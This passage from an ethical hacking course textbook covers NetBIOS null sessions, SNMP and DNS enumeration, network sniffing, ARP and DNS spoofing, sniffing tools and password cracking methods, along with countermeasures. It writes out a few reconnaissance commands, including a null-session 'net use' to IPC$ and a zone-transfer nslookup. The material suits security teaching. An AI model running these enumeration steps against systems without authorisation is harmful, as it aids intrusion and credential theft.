can exploit the null session vulnerability to connect to the target
system and change the share path or edit the registry.

iii. The SMB Auditing Tool is a password-auditing tool for the

Windows and Server Message Block (SMB) platforms. Windows
uses SMB to communicate between the client and server. The SMB
Auditing Tool is able to identify usernames and crack passwords
on Windows systems.

iv. The NetBIOS Auditing Tool is another NetBIOS enumeration tool.

It’s used to perform various security checks on remote servers
running NetBIOS file sharing services

v. User2SID and SID2User are command-line tools that look up

Windows service identifiers (SIDs from username input and vice
versa.)

vi. Enum is a command-line enumeration utility. It uses null sessions

and can retrieve usernames, machine names, shares, group and
membership lists, passwords, and Local Security policy
information. Enum is also capable of brute-force dictionary attacks
on individual accounts.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 89

 Ethical Hacking Part I

vii. UserInfo is a command-line tool that’s used to gather usernames

and that can also be used to create new user accounts.

viii. GetAcct is a GUI-based tool that enumerates user accounts on a

system.

ix. SMBBF is a SMB brute-force tool that tries to determine user

accounts and accounts with blank passwords.

6.4. Null Sessions50

A null session occurs when you log in to a system with no username or

password. NetBIOS null sessions are vulnerability found in the Common
Internet File System (CIFS) or SMB, depending on the operating system.
Once a hacker has made a NetBIOS connection using a null session to a
system, they can easily get a full dump of all usernames, groups, shares,
permissions, policies, services and more using the Null user account.

You can establish a Null Session with a Windows (NT/2000/XP) host by

logging on with a null user name and password. Using these null
connections allows you to gather the following information from the host:

 List of users and groups

 List of machines
 List of shares
 Users and host SIDs (Security Identifiers)

In the enumeration phase, the attacker gathers information such as

network user and group names, routing tables, and Simple Network
Management Protocol (SNMP) data However, in addition to the standard
user, the OS also supports a unique type of user called the ‘null’ user,
which is basically a pseudo-account that has no username or password,
but is allowed to access certain information on the network. The Null
user is capable of enumerating account names and shares on domain
controllers, member servers, and workstations. This makes the Null user,
a user with no credentials, a potential means of attack by crackers to
elicit information and compromise the system.

50
Book: CEH Certified Ethical Hacker Study Guide By Kimberly Graves
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 90
 Ethical Hacking Part I

The SMB and NetBIOS standards in Windows include APIs that return
information about a system via TCP port 139. One method of connecting
a NetBIOS null session to a Windows system is to use the hidden Inter
Process Communication share (IPC$). This hidden share is accessible
using the net use command. As mentioned earlier, the net use command
is a built-in Windows command that connects to a share on another
computer. The empty quotation marks ("") indicate that you want to
connect with no username and no password. To make a NetBIOS null
session to a system with the IP address 192.21.7.1 with the built-in
anonymous user account and a null password using the net use
command, the syntax is as follows: C: \> net use \\192.21.7.1 \IPC$ ""
/u: "" Once the net use command has been successfully completed, the
hacker has a channel over which to use other hacking tools and
techniques.

Now, let us take a look at a typical LANMAN sessions on Windows 2000

 Here, the client sends a pre-authenticated (hash of user password)

request along with a time stamp to the key distribution center
(KDC) that resides on the domain controller (DC) of the concerned
domain, requesting for a ticket granting ticket (TGT).

 The KDC extracts the hash of the user identity from its database
and decrypts the request with it, noting the time stamp as well for
recentness of request. A valid user account results in successful
decryption.

 The KDC sends back a TGT, that contains among other

information the session key (encrypted with users password) and
the security identifiers (SID) identifying the user and the group
among other things.

 The client uses the ticket to access the required resources.

A null session is an insecure (unauthenticated) connection with no proof

of identity. No user and password credentials are supplied in the
establishment of the session. No session key is exchanged when
establishing a null session, and hence it is impossible for the system to
send encrypted or even signed messages on behalf of the user under a
null session.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 91

 Ethical Hacking Part I

When the LSA is asked to create a token for a remote client

communicating via a null session, it produces a token with a user SID of
S-1-5-7 (the null logon session), and a user name of anonymous logon.
We have seen earlier that everyone is included in all tokens, and the null
session is classified as a network logon. This gives the null user access to
file system shares and named pipes.

Other areas where null sessions are considered useful are when the
LMHOSTS.SAM file uses the “#INCLUDE” tag. The share point that
contains the included file must be setup as a null session share.
Additionally where a service, running under the local “SYSTEM” account,
needs access to some network resource, a null session may be
established to access these resources.

An interesting part is that Null sessions can also be established at the

API level with languages such as C++. Null sessions can be used to
establish connections to ‘null session pipes’, if it is allowed by the server.
A ‘pipe’ is a facility that allows a process on one system to communicate
with a process on another system, while a inter process communication
share allows communication between two processes on the same system.
Null sessions can also be used to establish connections to shares,
including such system shares as \\servername\IPC$. The IPC$ is a
special hidden share. It may be noted that the IPC$ share is an interface
to the ’server’ process on the machine, also associated with a pipe so it
can be accessed remotely. Null sessions make the enumeration of users,
machines, and resources easier for administrative purposes especially
across domains. This is the lure for the attacker who intends to use a
null session to connect to the machine.

During port scanning, the attacker takes note of any response from TCP
port 139 and 445. Why would these ports interest an attacker? The
answer lies in the SMB protocol.

The SMB (Server Message Block) protocol is known for its use in file
sharing on Windows NT / 2000 series among other things. Attackers can
potentially intercept and modify unsigned SMB packets then modify the
traffic and forward it so that the server might perform undesirable
actions. Alternatively, the attacker could pose as the server or client after
a legitimate authentication and gain unauthorized access to data.

SMB is the resource sharing protocol supported by many Microsoft

operating systems; it is the basis of network basic input/output system
(NetBIOS) and many other protocols. SMB signing authenticates both the
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 92
 Ethical Hacking Part I

user and the server hosting the data. In Windows NT it ran on top of NBT
(NetBIOS over TCP/IP), making it a bulky protocol with a large header as
well as consuming greater time. In Windows NT, it used the ports 137,
138 (UDP) and 139 (TCP). In Windows 2000, SMB was allowed to directly
run over TCP/IP, without the extra layer of NBT. Therefore, port 445
started being used for this purpose.

Each SMB session consumes server resources. Establishing numerous

null sessions will slow or possibly crash the server even in Windows
2003. An attacker could repeatedly establish SMB sessions until the
server stops responding. SMB services will become slow or unresponsive.

For more information about SMB protocol refers below link:

http://alt.pluralsight.com/wiki/default.aspx/Keith.GuideBook/WhatIsA
NullSession.html

6.4.1. NetBIOS Enumeration and Null Session Countermeasures

The NetBIOS null session use specific port numbers on the target
machine. Null sessions require access to TCP ports 135, 137,139, and/or
445. One countermeasure is to close these ports on the target system.
This can be accomplished by disabling SMB services on individual hosts
by unbinding the TCP/IP WINS client from the interface in the network
connection’s properties.

An attacker will use the information gained from NULL sessions and try
to logon to the system, using various tools that will try different
username and password combinations. Common attacks against
computers have shown that attackers will typically gain access to the
system, install FTP servers, IRC bots, and DDOS tools, then copy the
illegal (copyrighted and pirated) software up for distribution. The FTP
server Serv-U FTP Server and the IRC bot iroffer are very common as
well. This task is made easier by users who when prompted for an
administrator password when installing NT/2000/XP leave it blank.
Please set a password on every account on your machine, if not for the
security of your machine, then for the security of all our machines.

A worm called "Zotob" that takes advantage of the MS05-039

vulnerability relies on NULL sessions to propagate. Follow the
instructions in the next section to protect yourself and of course apply all
operating system patches. Below are instructions on how to manually
disable NetBIOS NULL sessions.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 93

 Ethical Hacking Part I

Note, disabling NULL sessions will allow you to have a much more secure
computer; however it could break certain legacy software applications.

6.4.2. How to Disable NetBIOS NULL Sessions

Disabling NULL session on your Windows PC can keep you from getting
infected. To implement this countermeasure, perform the following steps:

1. Open the properties of the network connection.

2. Click TCP/IP and then the Properties button.
3. Click the Advanced button.
4. On the WINS tab, select disable NetBIOS over TCP/IP.

A. Windows XP Home Edition

Note: This also works in Windows 2000 and XP Professional.

1. Open regedt32. Set the Following Registry Key:

2. Choose Edit _ Add Value. Enter these values:

HKLM/System/CurrentControlSet/Control/LSA/Restrict
Anonymous=2

 Value name: Restrict Anonymous

 Data Type: REG_WORD
 Value: 2

3. Reboot to make the changes take effect.

B. Windows XP Professional Edition and Windows Server 2003

1. Go to Administrative Tools --> Local Security Policy --> Local
Policies --> Security Options. Make sure the following two policies
are enabled:

Network Access: Do not allow anonymous enumeration of SAM

accounts: Enabled (Default)

Network Access: Do not allow anonymous enumeration of SAM

accounts and shares: Enabled

This can also be accomplished using the following registry keys:

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 94

 Ethical Hacking Part I

HKLM\System\CurrentControlSet\Control\Lsa\Restrict
Anonymous=1 (This disallows enumeration of shares)

HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymo
usSAM=1 (Default, not allowing enumeration of user accounts)

2. Reboot to make the changes take effect.

C. Windows 2000

1. Go to --> Administrative Tools --> Local Security Settings --> Local

Policies --> Security Options
2. Select "Additional restrictions of anonymous connections" in the
Policy pane on the right
3. From the pull down menu labeled "Local policy setting", select: "No
access without explicit anonymous permissions"
4. Click OK
5. The registry setting equivalent is:
HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymo
us=2
6. Reboot to make the changes take effect.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 95

 Ethical Hacking Part I

6.5. SNMP Enumeration

Simple Network Management Protocol (SNMP) is a TCP/IP standard

protocol that is used for remote monitoring, managing hosts, routers,
and devices on a network. SNMP works through a system of agents and
nodes. Gathering information about hosts, routers, devices etc. with the
help of SNMP is known as SNMP enumeration. The names of the default
community strings are public and private, which are transmitted in clear
text. Default community strings are advantageous to a hacker, as they
provide more than enough information needed to launch an attack.
SNMP enumeration is the process of using SNMP to enumerate user
accounts on a target system. The Simple Network Management Protocol
is used to manage and monitor hardware devices connected to a
network. An SNMP-managed network consists of three key components:


Network Management System = software which runs on Master


SNMP Agents = software which runs on Slave device
Managed devices (SNMP agent deployed)= Slave device

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 96

 Ethical Hacking Part I

The managed devices records information and by use of the deployed

agent communicate with the overarching Network Management System.
This information is stored in a Management Information Base (MIB).A
managed device is a network node that implements an SNMP interface
that allows unidirectional (read-only) or bidirectional access to node-
specific information. Managed devices exchange node-specific
information with the NMSs. Sometimes called network elements, the
managed devices can be any type of device, including, but not limited to,
routers, access servers, switches, bridges, hubs, IP telephones, computer
hosts, and printers.

An agent is a network-management software module that resides on a

managed device. An agent has local knowledge of management
information and translates that information to or from an SNMP specific
form.

A network management system (NMS) executes applications that

monitor and control managed devices. NMSs provide the bulk of the
processing and memory resources required for network management.
One or more NMSs may exist on any managed network.
SNMP is dangerous as it is a clear text protocol and as such could
potentially provide valuable information to an attacker.

You may have heard of SNMP Community Strings, the default is Public
and Private. Should you be utilizing SNMP in your domain, these should
be changed as they are the first strings that an attacker will try to gain
information about your network and more dangerously, control over your
hardware.

Another term of note is SNMP Traps, this is generally when a device has
been configured to receive pre-configured alerts/ information from other
clients. SNMP uses UDP Port 161 to communicate.

Almost all network infrastructure devices, such as routers and switches

and including Windows systems, contain an SNMP agent to manage the
system or device. The SNMP management station sends requests to
agents, and the agents send back replies. The requests and replies refer
to configuration variables accessible by agent software. Management
stations can also send requests to set values for certain variables. Traps
let the management station know that something significant has
happened in the agent software such as a reboot or an interface failure.
Management Information Base (MIB) is the database of configuration

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 97

 Ethical Hacking Part I

variables, which resides on the networking device. SNMP has two

passwords you can use to access and configure the SNMP agent from the
management station.

The first is called a read community string. This password lets you view
the configuration of the device or system.

The second is called the read/write community string; it’s for changing
or editing the configuration on the device.

Generally, the default read community string is public and the default
read/write community string is private. A common security loophole
occurs when the community strings are left at the default settings: A
hacker can use these default passwords to view or change the device
configuration.

6.5.1. SNMP Enumeration Tools

SNMPUtiland IP Network Browser are SNMP enumeration tools.

i. SNMPUtil gathers Windows user account information via SNMP in

Windows systems. Some information such as routing tables, ARP
tables, IP addresses, MAC addresses, TCP and UDP open ports,
user accounts, and shares can be read from a Windows system
that has SNMP enabled using the SNMPUtil tools.

ii. IP Network Browser from the SolarWinds toolset also uses SNMP
to gather more information about a device that has an SNMP
agent.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 98

 Ethical Hacking Part I

6.5.2. SNMP Enumeration Countermeasures

The simplest way to prevent SNMP enumeration is to remove the SNMP

agent on the potential target systems or turn off the SNMP service. If
shutting off SNMP isn’t an option, then change the default read and
read/write community names. In addition, an administrator can
implement the Group Policy security option Additional Restrictions for
Anonymous Connections, which restricts SNMP connections.

6.6. Windows 2000 DNS Zone Transfer

In a Windows 2000 domain, clients use service (SRV) records to locate

Windows 2000 domain services, such as Active Directory and Kerberos.
This means every Windows 2000 Active Directory domain must have a
DNS server for the network to operate properly.

A simple zone transfer performed with the nslookup command can

enumerate lots of interesting network information. The command to
enumerate using the nslookup command is as follows:

nslookupls -d domainname

Within the nslookup results, a hacker looks closely at the following

records, because they provide additional information about the network

 Global Catalog service (_gc._tcp_)

services:

 Domain controllers (_ldap._tcp)

 Kerberos authentication (_kerberos._tcp)

As a countermeasure, zone transfers can be blocked in the properties of

the Windows DNS server. An Active Directory database is a Lightweight
Directory Access Protocol (LDAP) based database. This allows the existing
users and groups in the database to be enumerated with a simple LDAP
query. The only thing required to perform this enumeration is to create
an authenticated session via LDAP. A Windows 2000 LDAP client called
the Active Directory Administration Tool (ldp.exe) connects to an Active
Directory server and identifies the contents of the database. You can find
ldp.exe on the Windows 2000 CD-ROM in the
Support\Reskit\Netmgmt\Dstoolfolder.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 99

 Ethical Hacking Part I

To perform an Active Directory enumeration attack, a hacker performs

the following steps:

1. Connect to any Active Directory server using ldp.exe on port 389.

When the connection is complete, server information is displayed in
the right pane.

2. On the Connection Menu, choose to authenticate. Type the

username, password, and domain name in the appropriate boxes.
You can use the Guest account or any other domain account.

3. Once the authentication is successful, enumerate users and built-in

groups by choosing the Search option from the Browse menu.

6.7. Enumeration Countermeasures

Use the following checklist of countermeasures to effectively reconfigure

your Internet-facing systems not to give away potentially sensitive
information:

Configure web servers to prevent indexing of directories that don't

contain index.html or similar index files (default.asp under IIS, for
example). Also ensure that sensitive documents and files aren't kept on
publicly accessible hosts, such as HTTP or FTP servers.

 Always use a generic, centralized network administration

contact detail (such as an IT help desk) in Network Information
Center databases, to prevent potential social engineering and
war dialing attacks against IT departments from being effective.
 Configure all name servers to disallow DNS zone transfers to
untrusted hosts.
 Ensure that nonpublic hostnames aren't referenced to IP
addresses within the DNS zone files of publicly accessible DNS
servers, to prevent reverse DNS sweeping from being effective.
This practice is known as split horizon DNS, using separate
DNS zones internally and externally.
 Ensure that HINFO and other novelty records don't appear in
DNS zone files.
 Configure SMTP servers either to ignore email messages to
unknown recipients or to send responses that don't include the
following types of information:

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 100

 Ethical Hacking Part I

 Details of mail relay systems being used (such as Send mail

or MS Exchange).
 Internal IP address or host information.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 101

 Ethical Hacking Part I

CHAPTER 7
SNIFFERS

Objective
7.1 Introduction of Sniffing
7.2 Types of Sniffing
7.3 Sniffing Protocols
7.4 Sniffing Tools
7.5 Countermeasures

7.1. Introduction of
51
Sniffing
A sniffer can be a packet-capturing
or frame-capturing tool. It
intercepts traffic on the network
and displays it in either a
command-line or GUI format for a
hacker to view. Some sophisticated
sniffers interpret the packets and
can reassemble the packet stream
into the original data, such as an
e-mail or a document. Sniffers are
used to capture traffic sent
between two systems. Depending
on how the sniffer is used and the
security measures in place, a hacker can use a sniffer to discover
usernames, passwords, and other confidential information transmitted
on the network. Several hacking attacks and various hacking tools
require the use of a sniffer to obtain important information sent from the
target system. This chapter will describe how sniffers work and identify
the most common sniffer hacking tools.

51
Book: CEH: Official Certified Ethical Hacker Review Guide by Kimberly Graves
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 102
 Ethical Hacking Part I

7.2. Types of Sniffing

7.2.1.Passive Sniffing

Passive sniffing involves listening and capturing traffic, and is useful in a

network connected by hubs. In networks that use hubs or wireless media
to connect systems, all hosts on the network can see all traffic; therefore
a passive packet sniffer can capture traffic going to and from all hosts
connected via the hub.

7.2.2.Active Sniffing

Active sniffing involves launching an Address Resolution Protocol

(ARP) spoofing or traffic-flooding attack against a switch in order to
capture traffic. A switched network operates differently. The switch looks
at the data sent to it and tries to forward packets to their intended
recipients based on MAC address. The switch maintains a MAC table of
all the systems and the port numbers to which they’re connected. This
enables the switch to segment the network traffic and send traffic only to
the correct destination MAC addresses.52

52
http://ethicalhacking.org.ua/8794final/lib0025.html
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 103
 Ethical Hacking Part I

7.3.Protocols Responsible For Sniffing

A sniffer can be a packet-capturing or frame-capturing tool. It intercepts

traffic on the network and displays it in either a command-line or GUI
format for a hacker to view. Some sophisticated sniffers interpret the
packets and can reassemble the packet stream into the original data,
such as an e-mail or a document. Sniffers are used to capture traffic sent
between two systems. Depending on how the sniffer is used and the
security measures in place, a hacker can use a sniffer to discover
usernames, passwords, and other confidential information transmitted
on the network.

7.3.1.ARP Poisoning

ARP (Address Resolution Protocol) allows the network to translate IP

addresses into MAC addresses. When one host using TCP/IP on a LAN
tries to contact another, it needs the MAC address or hardware address
of the host it’s trying to reach. It first looks in its ARP cache to see if it
already has the MAC address; if it doesn’t, it broadcasts an ARP request
asking, “Who has the IP address I’m looking for?” If the host that has
that IP address hears the ARP query, it responds with its own MAC
address, and a conversation can begin using TCP/IP.

ARP poisoning is a technique that’s used to attack an Ethernet network

and that may let an attacker sniff data frames on a switched LAN or stop
the traffic altogether. ARP poisoning utilizes ARP spoofing where the
purpose is to send fake, or spoofed, ARP messages to an Ethernet LAN.
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 104
 Ethical Hacking Part I

These frames contain false MAC addresses that confuse network devices
such as network switches. As a result, frames intended for one machine
can be mistakenly sent to another (allowing the packets to be sniffed) or
to an unreachable host (a Denial of Service [DoS] attack). ARP spoofing
can also be used in a man-in-the-middle attack in which all traffic is
forwarded through a host by means of ARP spoofing and analyzed for
passwords and other information.

To prevent ARP spoofing, permanently add the MAC address of the

gateway to the ARP cache on a system. You can do this on a Windows
system by using the ARP –s command at the command line and
appending the gateway’s IP and MAC addresses. Doing so prevents a
hacker from overwriting the ARP cache to perform ARP spoofing on the
system but can be difficult to manage in a large environment because of
the number of systems. In an enterprise environment, port-based
security can be enabled on a switch to allow only one MAC address per
switch port.

7.3.2.MAC Flooding

A packet sniffer on a switched network can’t capture all traffic as it can

on a hub network; instead, it captures either traffic coming from or
traffic going to the system. It’s necessary to use an additional tool to
capture all traffic on a switched network. There are essentially two ways
to perform active sniffing and make the switch send traffic to the system
running the sniffer: ARP spoofing and flooding. As mentioned earlier,
ARP spoofing involves taking on the MAC address of the network gateway
and consequently receiving all traffic intended for the gateway on the
sniffer system.

A hacker can also flood a switch with so much traffic that it stops
operating as a switch and instead reverts to acting as a hub, sending all
traffic to all ports. This active sniffing attack allows the system with the
sniffer to capture all traffic on the network.

7.3.3.DNS Spoofing

When a user requests a certain website URL, the address is looked up on

a DNS server to find the corresponding IP address. If the DNS server has
been compromised, the user is redirected to a website other than the one
that was requested, such as a fake website.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 105

 Ethical Hacking Part I

To perform a DNS attack, the attacker exploits a flaw in the DNS server
software that can make it accept incorrect information. If the server
doesn’t correctly validate DNS responses to ensure that they come from
an authoritative source, the server ends up caching the incorrect entries
locally and serving them to users that make subsequent requests. This
technique can be used to replace arbitrary content for a set of victims
with content of an attacker’s choosing.
For example, an attacker poisons the IP addresses DNS entries for a
target website on a given DNS server, replacing them with the IP address
of a server the hacker controls. The hacker then creates fake entries for
files on this server with names matching those on the target server.
These files may contain malicious content, such as a worm or a virus. A
user whose computer has referenced the poisoned DNS server is tricked
into thinking the content comes from the target server and unknowingly
downloads malicious content. The types of DNS spoofing techniques are
as follows:

Intranet spoofing—acting as a device on the same internal network.

Internet spoofing—acting as a device on the Internet.
Proxy server DNS poisoning—modifying the DNS entries on a proxy
server so the user is redirected to a different host system.
DNS cache poisoning—modifying the DNS entries on any system so the
user is redirected to a different host.

7.4. Sniffing Tools

i. Ethereal is a freeware sniffer that can capture packets from a

wired or wireless LAN connection. The latest version has been
renamed WireShark. Ethereal is a common and popular program
because it is free but has some drawbacks. An untrained user may
find it difficult to write filters in Ethereal to capture only certain
types of traffic.
ii. Snort is an intrusion detection system (IDS) that also has sniffer
capabilities. It can be used to detect a variety of attacks and
probes, such as buffer overflows, stealth port scans, CGI attacks,
Server Message Block (SMB) probes, and OS fingerprinting
attempts.
iii. WinDump is the Windows version of tcpdump, the command-line
network analyzer for Unix. WinDump is fully compatible with
tcpdump and can be used to watch, diagnose, and save to disk
network traffic according to various rules.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 106

 Ethical Hacking Part I

iv. EtherPeek is a great sniffer for wired networks with extensive

filtering and TCP/IP conversation tracking capabilities. The latest
version of EtherPeek has been renamed OmniPeek.
v. WinSniffer is an efficient password sniffer. It monitors incoming
and outgoing network traffic and decodes FTP, POP3, HTTP, ICQ,
Simple Mail Transfer Protocol (SMTP), Telnet, Internet Message
Access Protocol (IMAP), and Network News Transfer Protocol
(NNTP) usernames and passwords.
vi. Iris is an advanced data- and network-traffic analyzer that collects,
stores, organizes, and reports all data traffic on a network. Unlike
other network sniffers, Iris is able to reconstruct network traffic,
such as graphics, documents, and e-mails including attachments.
vii. EtherFlood is used to flood an Ethernet switch with traffic to
make it revert to a hub. By doing this, a hacker is able to capture
all traffic on the network rather than just traffic going to and from
their system, as would be the case with a switch.
viii. Dsniff is a collection of Unix-executable tools designed to perform
network auditing as well as network penetration. The following
tools are contained in dsniff: filesnarf, mailsnarf, msgsnarf,
urlsnarf, and webspy. These tools passively monitor a vulnerable
shared network (such as a LAN where the sniffer sits behind any
exterior firewall) for interesting data (passwords, e-mail, files, and
so on).
ix. Sshmitm and webmitm implement active man-in-the-middle
attacks against redirected Secure Shell (SSH) and HTTPS sessions.
x. Arpspoof, dnsspoof, and macof work on the interception of
switched network traffic that is usually unavailable to a sniffer
program because of switching. To get around the layer 2 packet
switching issue, dsniff spoofs the network into thinking that it’s a
gateway that data must pass through to get outside the network.
xi. IP Restrictions Scanner (IRS) is used to find the IP restrictions
that have been set for a particular service on a host. It combines
ARP poisoning with TCP stealth or half-scan technique and
exhaustively tests all possible spoofed TCP connections to the
selected port of the target. IRS can find servers and network
devices like routers and switches and identify access-control
features like access control lists (ACLs), IP filters, and firewall
rules.
xii. sTerm is a Telnet client with a unique feature: It can establish a
bidirectional Telnet session to a target host, without ever sending
the real IP and MAC addresses in any packet. Using ARP
poisoning, MAC spoofing, and IP spoofing techniques, sTerm can

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 107

 Ethical Hacking Part I

effectively bypass ACLs, firewall rules, and IP restrictions on

servers and network devices.
xiii. Cain & Abel is a multipurpose hacking tool for Windows. It allows
easy recovery of various kinds of passwords by sniffing the
network; cracking encrypted passwords using dictionary, brute
force; recording VoIP conversations; decoding scrambled
passwords; revealing password boxes; uncovering cached
passwords; and analyzing routing protocols. The latest version
contains a lot of new features like ARP Poison Routing (APR), which
enables sniffing on switched LANs and man-in-the-middle attacks.
The sniffer in this version can also analyze encrypted protocols
such as SSH-1 and HTTPS, and it contains filters to capture
credentials from a wide range of authentication mechanisms.

xiv. Packet Crafter is a tool used to create custom TCP/IP/UDP

packets. The tool can change the source address of a packet to do
IP spoofing and can control IP flags such as checksums and TCP
flags such as the state flags, sequence numbers, and ack number.
xv. SMAC is a tool to change the MAC address of a system. It lets a
hacker spoof a MAC address when performing an attack.
xvi. MAC Changer is a tool used to spoof a MAC address on Unix. It
can be used to set the network interface to a specific MAC address,
set the MAC randomly, set a MAC of another vendor, set another
MAC of the same vendor, set a MAC of the same kind, or even to
display a vendor MAC list to choose from.
xvii. WinDNSSpoof is a simple DNS ID spoofing tool for Windows. To
use it on a switched network, you must be able to sniff traffic of
the computer being attacked. Therefore it may need to be used in
conjunction with an ARP spoofing or flooding tool.
xviii. Distributed DNS Flooder sends a large number of queries to
create a DOS attack, disabling DNS. If DNS daemon software logs
incorrect queries, the impact of this attack is amplified.

7.5. Sniffing Countermeasures

The best security defense against a sniffer on the network is encryption.

Although encryption won’t prevent sniffing, it renders any data captured
during the sniffing attack useless because hacker can’t interpret the
information. Encryption such as AES and RC4 or RC5 can be utilized in
VPN technologies and is a common method to prevent sniffing on a
network.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 108

 Ethical Hacking Part I

i. netINTERCEPTOR is a spam and virus firewall. It has advanced

filtering options and can learn and adapt as it identifies new spam.
It also intercepts and quarantines the latest e-mail viruses and
Trojans, preventing a Trojan from being installed and possibly
installing a sniffer.

ii. Sniffdet is a set of tests for remote sniffer detection in TCP/IP

network environments. Sniffdet implements various tests for the
detection of machines running in promiscuous mode or with a
sniffer.

iii. WinTCPKill is a TCP connection termination tool for Windows. The

tool requires the ability to use a sniffer to sniff incoming and
outgoing traffic of the target. In a switched network, WinTCPKill
can use an ARP cache-poisoning tool that performs ARP spoofing.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 109

 Ethical Hacking Part I

CHAPTER 8
PASSWORD CRACKING
Objective
8.1 Introduction of Password Cracking
8.2 Attack methods
8.3 Password Cracking Tools
8.4 Web-Based Password Cracking
8.1. Introduction
Password cracking is the process of recovering passwords from data that
has been stored in or transmitted by a computer system. A common
approach is to repeatedly try guesses for the password. The purpose of
password cracking might be to help a user recover a forgotten password
to gain unauthorized access to a system, or as a preventive measure by
system administrators to check for easily crackable passwords. On a file-
by file basis, password cracking is utilized to gain access to digital
evidence for which a judge has allowed access but the particular file's
access is restricted.

53

8.1.1.Password Cracker

A password cracker is a program designed to decrypt passwords or

disable password protection. Password crackers rely on dictionary
searches attacks or brute-force methods to crack passwords.

8.1.2.How Does a Password Cracker Work?

There are some methods to crack the password like Dictionary

attack,Bruteforceattack,Salting,Precomputation(Rainbowtables,)Keylogge
53
pcmag.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 110
 Ethical Hacking Part I

rs etc.With Dictionary attack how Password Cracker works is discussed

below.
The first step in a dictionary attack is to be to generate a list of potential
passwords that can be found in a dictionary. The hacker usually creates
this list with a dictionary generator program or dictionaries that can be
downloaded from the Internet. Next, the list of dictionary words is
hashed or encrypted. This hash list is compared against the hashed
password the hacker is trying to crack. The hacker can get the hashed
password by sniffing it from a wired or wireless network or directly from
the Security Accounts Manager (SAM) or shadow password files on the
hard drive of a system. Finally, the program displays the unencrypted
version of the password. Dictionary password crackers can only discover
passwords that are dictionary words. If the user has implemented a
strong password, then brute-force password cracking can be
implemented. Brute-force password crackers try every possible
combination of letters, numbers, and special characters, which takes
much longer than a dictionary attack because of the number of
permutations.
Passwords to access computer systems are usually stored in a database
so that the system can perform password verification when a user
attempts to log in or access a restricted resource. To preserve
confidentiality of system passwords, the password verification data is
typically not stored in cleartext form, but instead a one-way function is
applied to the password, possibly in combination with other data, and
the resulting value is stored. When a user later attempt to authenticate
by entering the password, the same function is applied to the entered
value and the result is compared with the stored value. If they match,
there is an extremely high probability that the entered password was
correct. For simplicity in this discussion, we will refer to the one way
function employed as a hash and its output as a hashed password.
Even though functions that create hashed passwords may be
cryptographically secure, possession of the hashed password provides a
quick way to test guesses for the password by applying the one-way
function to each guess, and comparing the result to the verification data.
The most commonly used hash functions can be computed rapidly and
the attacker can test guesses repeatedly with different guesses until one
succeeds, meaning that the plaintext password has been recovered.
The term password cracking generally refers to recovery of one or more
plaintext passwords from hashed passwords, but there are also many
other ways of obtaining passwords illicitly. Without the hashed version of
a password, the attacker can still attempt access to the computer system

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 111

 Ethical Hacking Part I

in question with guessed passwords. But well-designed systems limit the

number of failed access attempts and can alert administrators to trace
the source of the attack if that quota is exceeded. If he has the hashed
password, the attacker can work undetected, and if the attacker has
obtained several hashed passwords, the chance of cracking at least one
is quite high.
Other ways to obtain passwords include social engineering, wiretapping,
keystroke logging, login spoofing, dumpster diving, phishing, shoulder
surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or
virus, identity management system attacks and compromising host
security. While those methods are not considered "password cracking"
they are very popular among criminals and remain very effective. They
are often considered as the main vulnerability in password
authentication systems.
Common methods for verifying users over a computer network often
expose the hashed password. For example, use of a hash-based
challenge-response authentication method for password verification may
provide a hashed password to a network eavesdropper, who can then
crack the password. A number of stronger cryptographic protocols exist
that do not expose hashed passwords during verification over a network,
either by protecting them in transmission using a high-grade key, or by
using a zero-knowledge password proof.
8.2.Attack Methods54

8.2.1. Weak encryption

If a system uses a poorly designed password hashing scheme to protect

stored passwords, an attacker can exploit any weaknesses to recover
even 'well-chosen' passwords. One example is the LM hash that Microsoft
Windows XP and previous uses by default to store user passwords of less
than 15 characters in length. LM hash converts the password into all
uppercase letters then breaks the password into two 7-character fields
which are hashed separately—which allows each half to be attacked
individually.

Password encryption schemes that use stronger hash functions like

MD5, SHA-512, SHA-1, and RIPEMD-160 can still be vulnerable to
brute-force and pre-computation attacks. Such attacks do not depend on
reversing the hash function. Instead, they work by hashing a large

54
Internet Security By Wikipedians
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 112
 Ethical Hacking Part I

number of words or random permutations and comparing the result of

each guess to a user's stored password hash. Modern schemes such as
MD5-crypt and bcrypt use purposefully slow algorithms so that the
number of guesses that an attacker can make in a given period of time is
relatively low. Salting, described below, greatly increases the difficulty of
such pre-computation attacks, perhaps sufficiently to resist all attacks;
every instance of its use must be evaluated independently, however.

Because progress in analyzing existing cryptographic hash algorithms is

always possible, a hash which is effectively invulnerable today may
become vulnerable tomorrow. Both MD5 and SHA-1, long thought
secure, have been shown vulnerable to less than brute force efficiency
attacks. For encryption algorithms the same has been true. DES has
been broken, and computers have become fast enough that its short key
(56 bits) is clearly and publicly insecure against even brute force attacks.
Passwords protected by these measures against attack will become
vulnerable, and passwords still in use thereby exposed.

8.2.2. Guessing
Passwords can sometimes be guessed by humans with knowledge of the
user's personal information. Examples of guessable passwords include:

 Blank (none)
 The words "password", "passcode", "admin" and their derivatives
 a row of letters from the qwerty keyboard -- qwerty itself, asdf, or
qwertyuiop)
 The user's name or login name
 The name of their significant other, a friend, relative or pet
 Their birthplace or date of birth, or a friend's, or a relative's
 Their automobile license plate number, or a friend's, or a relative's
